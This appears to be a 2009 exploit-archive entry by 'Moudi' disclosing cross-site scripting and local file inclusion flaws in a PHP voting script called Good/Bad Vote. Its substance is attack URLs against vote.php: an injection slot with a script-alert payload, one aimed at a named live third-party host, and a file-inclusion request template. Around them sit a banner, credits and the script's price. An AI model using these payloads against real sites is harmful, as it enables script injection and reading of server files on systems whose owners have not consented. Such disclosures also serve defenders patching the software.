[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Good/Bad Vote (XSS/LFI) Multiple Remote Vulnerabilities
# Published : 2009-07-17
# Author : Moudi
# Previous Title : WebAsyst Shop-Script (bSQL/XSS) Multiple Remote Vulnerabilities
# Next Title : Joomla Component Jobline <= 1.3.1 Blind SQL Injection Vulnerability


###########################################################################
#-----------------------------I AM MUSLIM !!------------------------------#
###########################################################################

==============================================================================
                      _      _       _          _      _   _ 
                     /     | |     | |        /     | | | |
                    / _    | |     | |       / _    | |_| |
                   / ___   | |___  | |___   / ___   |  _  |
   IN THE NAME OF /_/   _ |_____| |_____| /_/   _ |_| |_|
                                                             

==============================================================================
        [??] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]
==============================================================================
        [??] Good/Bad Vote (XSS/LFI) Vulnerability
==============================================================================

	[??] Script:             [ Good/Bad Vote ]
	[??] Language:           [ PHP ]
        [??] Download:           [ http://www.scriptsez.net/index.php?action=details&cat=Polls%20and%20Voting&id=1086552418  ]
	[??] Founder:            [ Moudi <m0udi@9.cn> ]
        [??] Thanks to:          [ MiZoZ , ZuKa , str0ke , 599em Man...]
        [??] Team:               [ EvilWay ]
        [??] Dork:               [ OFF ]
        [??] Price:              [ 6 US $ ]

###########################################################################

===[ Exploit XSS vulnerability ]===	
	
	[??] http://www.site.com/patch/vote.php?action=vote&id=[XSS]&ficdest=0%2Edat&midcast=0%2Etxt

        [??] http://searchall.iwebland.com:80/sigs/vote.php?action=vote&id=[XSS]&ficdest=0%2Edat&midcast=0%2Etxt
            XSS TO ADD: 1<script>alert(314154736094)</script>
           
===[ Exploit LFI ]=== 

       [??] http://www.site.com/patch/vote.php?action=dovote&id=[LFI]&ficdest=.dat&midcast=.txt

Author: Moudi

###########################################################################

# www.Syue.com [2009-07-17]